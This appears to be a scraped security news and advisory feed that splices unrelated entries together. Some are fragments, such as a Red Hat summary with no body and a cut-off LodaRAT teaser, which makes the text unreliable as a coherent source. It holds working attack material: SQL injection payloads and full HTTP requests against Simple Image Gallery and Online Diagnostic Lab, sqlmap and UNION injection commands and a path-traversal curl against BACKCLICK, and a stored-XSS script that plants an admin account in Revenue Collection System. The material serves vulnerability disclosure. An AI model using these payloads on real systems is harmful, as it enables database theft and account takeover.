Red Hat Security Advisory 2022-8506-01 - Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool. Issues addressed include code execution, cross site scripting, denial of service, remote SQL injection, and traversal vulnerabilities.

Red Hat Security Advisory 2022-8506-01

LodaRAT samples were deployed alongside other malware families, including RedLine and Neshta.
Cisco Talos identified several variants and altered versions of LodaRAT with updated functionality have been identified in the wild.
Changes in these LodaRAT variants include new functionality allowing proliferation to attached removable storage, a new string encoding algorithm

Get a Loda This: LodaRAT meets new friends

Dreamer CMS 4.0.01 is vulnerable to SQL Injection.

Java

1

https://gitee.com/isoftforce/dreamer\_cms.git

git@gitee.com:isoftforce/dreamer\_cms.git

isoftforce

dreamer\_cms

Dreamer CMS（梦想家CMS内容管理系统）

CVE-2022-42245: ArchivesMapper.xml has sql injection · Issue #I5U408 · 王俊南/Dreamer CMS（梦想家CMS内容管理系统） - Gitee.com

There is a command injection vulnerability using environment variables in Bitbucket Server and Data Center. An attacker with permission to control their username can exploit this issue to execute arbitrary code on the system. This vulnerability can be unauthenticated if the Bitbucket Server and Data Center instance has enabled “Allow public signup”.

**Bitbucket Server and Data Center- Command Injection Vulnerability - CVE-2022-43781**

Summary

CVE-2022-43781 - Command Injection Vulnerability

Advisory Release Date

16 Nov 2022 10 AM PDT (Pacific Time, -7 hours)

Product

*   Bitbucket Server
    
*   Bitbucket Data Center
    

CVE ID(s)

CVE-2022-43781

****Summary of Vulnerability****

This advisory discloses a critical severity security vulnerability introduced in version 7.0.0 of Bitbucket Server and Data Center. The following versions are affected by this vulnerability:

*   Bitbucket Data Center and Server 7.0 to 7.21
    
*   Bitbucket Data Center and Server 8.0 to 8.4 if mesh.enabled is set to false in bitbucket.properties
    

There is a command injection vulnerability using environment variables in Bitbucket Server and Data Center. An attacker with permission to control their username can exploit this issue to gain code execution and execute code on the system.

This issue can be tracked here: BSERV-13522 - Getting issue details... STATUS

**Atlassian Cloud sites are not affected.**

If you access Bitbucket via a bitbucket.org domain, it is hosted by Atlassian and you are not affected by the vulnerability.

****Severity****

Atlassian rates the severity level of this vulnerability as **critical**, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

****Affected Versions****

All versions of Bitbucket Server and Data Center from 7.0 to 7.21 are affected by this vulnerability. Versions 8.0 to 8.4 of Bitbucket Server and Data Center are also affected by this vulnerability if mesh.enabled=false is set in bitbucket.properties.

**Product**

**Affected Versions**

Bitbucket Server and Data Center

*   7.0 to 7.5 (all versions)
    
*   7.6.0 to 7.6.18
    
*   7.7 to 7.16 (all versions)
    
*   7.17.0 to 7.17.11
    
*   7.18 to 7.20 (all versions)
    
*   7.21.0 to 7.21.5
    

If mesh.enabled=false is set in bitbucket.properties:

*   8.0.0 to 8.0.4
    
*   8.1.0 to 8.1.4
    
*   8.2.0 to 8.2.3
    
*   8.3.0 to 8.3.2
    
*   8.4.0 to 8.4.1
    

****Fixed Versions****

**Product**

**Fixed Versions**

Bitbucket Server and Data Center

*   7.6.19 or newer
    
*   7.17.12 or newer
    
*   7.21.6 or newer
    
*   8.0.5 or newer
    
*   8.1.5 or newer
    
*   8.2.4 or newer
    
*   8.3.3 or newer
    
*   8.4.2 or newer
    
*   8.5.0 or newer
    

****What You Need to Do****

Atlassian recommends that you upgrade each of your affected installations to one of the listed fixed versions (or any later version) above (see the “Fixed Versions” section of this page for details). For a full description of the latest version of Bitbucket Server and Data Center, see the release notes. You can download the latest version of Bitbucket from the download center. For Frequently Asked Questions (FAQ) click here.

****Mitigation****

To remediate this vulnerability, update each affected product installation to a fixed version listed above.

If you’re unable to upgrade your Bitbucket instance, a temporary mitigation step is to disable “Public Signup”. Disabling public signup would change the attack vector from an unauthenticated attack to an authenticated one which would reduce the risk of exploitation. To disable this setting, go to **Administration > Authentication** and clear the **Allow public sign up** checkbox.

ADMIN or SYS\_ADMIN authenticated users still have the ability to exploit the vulnerability when public signup is disabled. For this reason, this mitigation should be treated as a temporary step and customers are recommended to upgrade to a fixed version as soon as possible.

Bitbucket Server and Data Center instances running PostgreSQL are not affected.

****Acknowledgements****

Information that led to the discovery of this vulnerability was provided by @Ry0taK.

****Support****

If you did not receive an email for this advisory and you wish to receive such emails in the future go to https://my.atlassian.com/email and subscribe to Alerts emails.

If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/.

****References****

Security Bug fix Policy

As per our new policy critical security bug fixes will be back ported in accordance with https://www.atlassian.com/trust/security/bug-fix-policy.  We will release new maintenance releases for the versions covered by the policy instead of binary patches.

**Binary patches are no longer released.** 

Severity Levels for security issues

Atlassian security advisories include a severity level and a CVE identifier. This severity level is based on our self-calculated CVSS score for each specific vulnerability. CVSS is an industry standard vulnerability metric. You can also learn more about CVSS at FIRST.org.

End of Life Policy

Our end of life policy varies for different products. Please refer to our EOL Policy for details.

CVE-2022-43781: Bitbucket Server and Data Center Security Advisory 2022-11-16 | Bitbucket Data Center and Server 8.6

A SQL injection vulnerability exits on the Simple Image Gallery System 1.0 application through "id" parameter on the album page.

**Exploit Title: Simple Image Gallery System 1.0 - "id" SQL Injection****Google Dork: N/A****Date: 2020-08-12****Exploit Author: M4sk0ff****Vendor Homepage: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=14903&title=Simple+Image+Gallery+Web+App+using+PHP+Free+Source+Code****Version: Version 1.0****Category: Web Application****Tested on: Kali Linux****CVE : CVE-2021-38819**

Description:

Simple Image Gallery System 1.0 application is vulnerable to SQL injection via the "id" parameter on the album page.

POC:

Step 1. Login to the application with any verified user credentials

Step 2. Click on Albums page and select an albums if created or create by clicking on "Add New" on the top right and select the album.

Step 3. Click on an image and capture the request in burpsuite. Now copy the request and save it as test.req .

Step 4. Run the sqlmap command "sqlmap -r test.req --dbs

Step 5. This will inject successfully and you will have an information disclosure of all databases contents.

Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3' AND 7561=7561 AND 'SzOW'='SzOW

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=3' OR (SELECT 9448 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(9448=9448,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'SXqA'='SXqA
    
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3' AND (SELECT 1250 FROM (SELECT(SLEEP(5)))aNMX) AND 'qkau'='qkau

CVE-2021-38819: CVE-2021-38819/CVE-2021-38819.md at main · m4sk0ff/CVE-2021-38819

An issue was discovered in BACKCLICK Professional 5.9.63. Due to insufficient escaping of user-supplied input, the application is vulnerable to SQL injection at various locations.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-029 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89) Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44003 Author of Advisory: Jannik Vieten, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see \[1\]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to insufficient escaping of user-supplied input, the application is vulnerable to SQL injection at various locations. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When SQL queries are constructed, user-controlled parameters are inserted in an insecure manner. Attackers can exploit this by injecting SQL syntax into parameters to influence the query executed by the database. This can be utilized to retrieve all data stored within the database. The vulnerability exists at various locations within the application. This indicates a structural or architectural problem of BACKCLICK's construction of SQL queries. Confer the "Proof of Concept" section below for exemplary incarnations of the issue. In order to prevent such vulnerabilities, user-controlled parameters must be considered potentially malicious. When constructing database queries, parameters need to be inserted securely in order to render injected SQL syntax harmless. The use of prepared statements with parameterized queries is a method that can be used to accomplish this (see \[4\]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following examples show locations where SQL injection was possible. This list is not intended to be exhaustive. The search function within the management interface at "Abonnenten - Verwaltung" > "Test-Verteiler" can be exploited using the tool sqlmap (see \[5\]): sqlmap.py --cookie JSESSIONID=\[...session id...\] -u 'https://example.com/bc/servlet/gui.bc\_rob\_positiv?idx=1&action=1&min=0&PATTERN=\*&HPS=50' --dbms mysql --level 5 --risk 3 A similar vulnerability is also exploitable by unauthenticated remote attackers. Here, the payload for a UNION-based injection is within a base64-encoded URL parameter: curl -k -i 'https://example.com/bc/servlet/web.announcements?dHlwZT0wJm1pZD0wJmxheW91dD0xJmlkPWEnIEFORCAxPTAgVU5JT04gU0VMRUNUIChTRUxFQ1Qgc3Vic2NyaWJlcl9lbWFpbCBGUk9NIHN1YnNjcmliZXJzIExJTUlUIDEpLCAxIC0tICZwcmV2aWV3PTE;1;1;' This corresponds with the following UNION-based injection: type=0&mid=0&layout=1&id=a' AND 1=0 UNION SELECT (SELECT subscriber\_email FROM subscribers LIMIT 1), 1 -- &preview=1 The server's response contains the extracted data (here: an e-mail address) in the "Location" header of the HTTP response: HTTP/1.1 500 500 Date: Wed, 11 May 2022 13:46:11 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: JSESSIONID=...; Path=/bc; Secure; HttpOnly Location: jane.doe@example.org&bc1=1&bc2=1 Content-Length: 1181 Connection: close Content-Type: text/html;charset=UTF-8 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for BACKCLICK https://www.backclick.de/ \[2\] SySS Security Advisory SYSS-2022-029 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-029.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy \[4\] OWASP SQL Injection Prevention Cheat Sheet https://cheatsheetseries.owasp.org/cheatsheets/SQL\_Injection\_Prevention\_Cheat\_Sheet.html \[5\] Automatic SQL injection and database takeover tool https://github.com/sqlmapproject/sqlmap ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Jannik Vieten of SySS GmbH. E-Mail: jannik.vieten@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Jannik\_Vieten.asc Key ID: 0xC3366ECBE2C70C423ECFC123858221C952002FFB Key Fingerprint: C336 6ECB E2C7 0C42 3ECF C123 8582 21C9 5200 2FFB ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEwzZuy+LHDEI+z8EjhYIhyVIAL/sFAmNk1xQACgkQhYIhyVIA L/saYQ/+LM3NsGrRo+ohC5YmL4oRY+oLXas6gXpRV6ltKPhQK64ErCtXAFQric/C q/7t7fP1tzm1LJzRV3Xf9F1OvLiRlE6ItQZeU75uTdBF/JwUl/Hqm5baCZTcbuH8 oQFw2pAVxSbphrlW9OdeiTsr5P4jVcb3MUQWhBiUq7aofr/vrHIBuBU4iP1ehz6A +6aDAdTqNmDmRTBVOoLQYuMccel4EGvUgTeFvcNCjSWhhhuEB9MCmNEHXDrUl9yi gDHzHKtIurpt2FWabc2flblL8IRLAP7z6QG4/kMPTbfuK0YUOISfO++4+UHMOUQ2 92/AMbZESMe0O26rHbnXNdygVR/FMQRFINurMcuLbb0gJtEqJXnpFJGCZ9ByeFRJ syNrjpdgaV1JwqQuJR9MBM4Fgo8rseFSQQVIGVaVMZOXkzDrFBJZMgxxpqGWx8jL HMcnmhVTEdsz6qjAHNT+hJZ8WWwJksO4RPgtpPB6lF1suaWHn7ZWzN4dUKe7DErt 6fEXFSkf1t3H8vVJLSSihyJwxO+hyVOHVBKN6NZaO/NMTLMZ+mzJjGFsC7wujrEP SziBzPxvelWKfJVKLUsbWHVr66g8T73wUVfJwNkS8ExFqUQ5HWZCOOL0nTgESPL8 vaZxzWhcPnCc9oVq6I8TuurSDQ8w3Vh2UzK3SGx+Wh5CPJy5EaU= =/w+N -----END PGP SIGNATURE-----

CVE-2022-44003

An issue was discovered in BACKCLICK Professional 5.9.63. Due to improper validation, arbitrary local files can be retrieved by accessing the back-end Tomcat server directly.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-037 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-23: Relative Path Traversal Risk Level: Medium Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44008 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see \[1\]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to improper validation, arbitrary local files can be retrieved by accessing the back-end Tomcat server directly. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Asset files are delivered using an error handler for HTTP 404 through ImageDisplayServlet. While a check for directory traversal is in place, URL decoding is performed after that check. The check can therefore be bypassed by URL-encoding the desired path components. Due to encoding normalization, this issue did not appear to be exploitable when the host is accessed through the Apache reverse proxy. However, the Tomcat listener is also reachable over the network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The database configuration file can be retrieved over Tomcat's HTTP interface, for example using curl: - ----- $ curl --path-as-is http://:8080/bc/assets/%2e%2e/META-INF/db-config.xml mysql\_innodb \[...\] 3306 backclick \[...\] - ---- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for BACKCLICK https://www.backclick.de/ \[2\] SySS Security Advisory SYSS-2022-037 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-037.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz\_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl PdoJ1ggAp0bPh2PGp6ZAKXsvWD8wRPc65xwvLVTXlgAP+xarIXb5O87o57MzsxjK R66hrkN2KpyF61xAHNTEhXKitt8BKmEQAUl2ZgrB/jWj2QEllR74Iyw13msok6CR 7lHcE3MdU/6lSaddRnXIMZ1oW6rGdf9Co8zNorRx9OC1mnp42rvTPDs+66jxbX4b Qs5SaMWnahk4LOf6Zpprjv1dHokaO1xpcCnQTocb1Dhie+d956EGPwoflwmepgXQ cjSoOmrOdKMTLwdvFiH/Pgm0Kg8p9NhmrkuubgmfLVwIWdhTMlS5koaiIDeDymSc 06h1kPOPw/ksj4fYolvWi+QjYjldAQ== =fyIi -----END PGP SIGNATURE-----

CVE-2022-44008

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at /diagnostic/login.php.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: hujun

vendors:https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

Vulnerability File: /diagnostic\_0/diagnostic/login.php

POST parameter 'username' exists delayed injection vulnerability

Payload1: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(5)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 118
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%285%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(5)), The server response time is 5 seconds

Payload2: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(10)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 119
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%2810%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(10)), The server response time is 10 seconds

Payload3: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(15)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 119
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%2815%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(15)), The server response time is 15 seconds

CVE-2022-43135: bug_report/SQLi-1.md at main · junHVV/bug_report

A service that allows organizations to back up data in the cloud can accidentally leak sensitive data to the public Internet, paving the way for abuse by threat actors.

Legions of databases are being inadvertently exposed monthly, through a feature of an Amazon cloud-based data-backup service. The situation gives threat actors access to personally identifiable information (PII) that they can use in extortion, ransomware, or other threat activity, researchers have found.  

Amazon RDS is a popular platform-as-a-service that provides a database based on several optional engines, including MySQL and PostgreSQL. An RDS snapshot, or a storage volume snapshot of a database instance, is an intuitive feature that helps organizations back up their databases, allowing users to share public data or a template database to an application, researchers said.

The Mitiga Research Team recently discovered the leaks in the form of numerous Amazon Relationship Database Service (RDS) snapshots that are being shared publicly — whether intentionally or by mistake.

Over the course of one month, researchers said that they observed 2,783 RDS snapshots, 810 of which were exposed publicly during the entire time frame. Additionally, 1,859 snapshots of the 2,783 were exposed for one-to-two days, which is still enough time for attackers to pounce upon the leak, they reported.

Individuals within an organization also can share these snapshots with colleagues by using the feature without having to worry about user profiles or roles — a scenario that leads to the snapshot being shared publicly, researchers said.

"These snapshots can be shared across different \[Amazon Web Services\] accounts — in or out of the on-premises organization, as well as AWS accounts that make the RDS snapshots publicly available," researchers wrote. "With that, one might unintentionally leak sensitive data to the world, even if you use highly secure network configuration."

Some of the exposures last for months, and some for just a short period of time, in both cases potentially allowing threat actors to take advantage, they said in a blog post shared online Wednesday.

**Uncovering Cloud Misconfigurations & User Errors**

The exposure once again highlights the potential for exploitation of the fragile security posture of cloud-based services that allow for enterprise resources to be shared on the public internet, Mitiga researchers Ariel Szarf, Doron Karmi, and Lionel Saposnik noted in the post.

"Attackers are always looking for new ways to put their hands on confidential information of organizations, mostly for financial gain," they wrote. "Some cloud services that allow sharing cloud resources widely to the world \[are\] exposing a new threat to organizations — unintentional sharing of information through resources like disk snapshots (EBS), or in our case DB snapshots (RDS)."

To conduct their research, the Mitiga team developed a AWS-native technique, using AWS Lambda Step Function and boto3, that can easily be integrated into an AWS environment and customized to investigate snapshot exposure.

Unfortunately, attackers also can develop such a tool to view public snapshots and perform the same tasks, allowing them to steal data from these public-facing resources and abuse it later to extort money from organizations that own it, researchers said.

Researchers outlined several specific instances in which they could access data from exposed snapshots during a month-long investigation.

One was a MySQL database exposed for the entire month that that appeared to be from a car rental agency. Exposed data included information from car-rental transactions, including PII of customers; business-knowledge data such as the type of cars in the company's fleet; and other specific rental information.

Another snapshot exposed for less than four hours came from a database of a now-defunct dating application that included a user table containing emails, password hashes, birth dates, links to personal images, private messages, and other personal data of about 2,200 users of the app.

**No PII? Still a Problem**

Even if an RDS snapshot that's exposed publicly includes no PII, there is still a way for threat actors to find out who the database and thus its data belongs to, researchers said.

In their investigation, they were able to identify who owned account IDs for many snapshots by simply looking at the snapshot name and seeing the company name in it, they said.

Moreover, every snapshot metadata contains a field called "MasterUsername," which is the main database username, researchers explained. In many cases, that username includes either the name of the company that owns the database fully spelled out or identified in acronyms and shortcuts; or a name of a person working at the company, they said.

In the latter case, by using a method that they admitted was "a little creepy, but useful," researchers conducted LinkedIn searches to find out where the people identified in the username worked, noting that this is a method threat actors could employ to do the same.

**Mitigating the Problem**

As many organizations using Amazon RDS may not even know if they have public snapshots, identifying if there are any in their respective environments is the first step toward mitigating the issue, researchers said.

Helpfully, Amazon sends an email quickly to users if they share a snapshot publicly, notifying them about the public snapshot to ensure that it was intended to be publicly available. In the case of a test done by researchers, this email was received 23 minutes after exposure.

Researchers also outlined a step-by-step way to conduct a historical check using CloudTrail logs to discover if someone created a public snapshot that potentially can be abused.

To prevent the creation of public Amazon RDS snapshots at all, enterprises should manage permissions well by adopting a practice of "least-privilege permissions," giving them only on a strict, as-needed basis.

They also can set service control policies (SCPs), which are AWS organizational-level policies that can specify the maximum permissions for an organization, researchers said. Applying SCP on an AWS root account to deny certain operations on RDS snapshot will prevent unintended sharing of RDS DBs, they said.

Organizations also can encrypt snapshots in AWS using a KMS key, and researchers confirmed in their investigation that it's not possible to share a snapshot publicly encrypted in this way, they said.

One roadblock to mitigation is that currently there's no way to know if someone has copied a public snapshot of an Amazon RDS database, as there is no log event for copying a public snapshot to another account or restoring a database instance from another account in the snapshot owner's account, researchers said.

Mitiga approached AWS about the issue and, upon confirmation that "logging an RDS copy and restore operation is currently unavailable," made a feature request to support its addition to the platform, researchers said.

Thousands of Amazon RDS Snapshots Are Leaking Corporate PII

Revenue Collection System version 1.0 suffers from a persistent cross site scripting vulnerability allowing an authenticated client user to add an administrative user account to the application then log in as the newly created admin.

    # Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS# Exploit Author: Joe Pollock# Date: November 16, 2022# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip# Tested on: Kali Linux, Apache, Mysql# CVE: T.B.C# Vendor: Kapiya# Version: 1.0# Exploit Description:#   Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated #   client user to add an administrative user account to the application then log in as the newly created admin.To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help).The help functionality is used to contact an administrator by sending a message. Paste the Javascript code below into the'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the'target', 'x_Username', and 'x_Passsword' as required).<script>var target = "http://localhost/rates/admin/usersadd.php";var req = new XMLHttpRequest();req.open("GET", target);req.send();var parser = new DOMParser();resp = req.responseTextvar document = parser.parseFromString(resp, "text/html");var token = document.getElementsByName("token")[0].value;var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1";req.open("POST", target);req.withCredentials = true;req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");req.send(params);</script>

Tag

#sql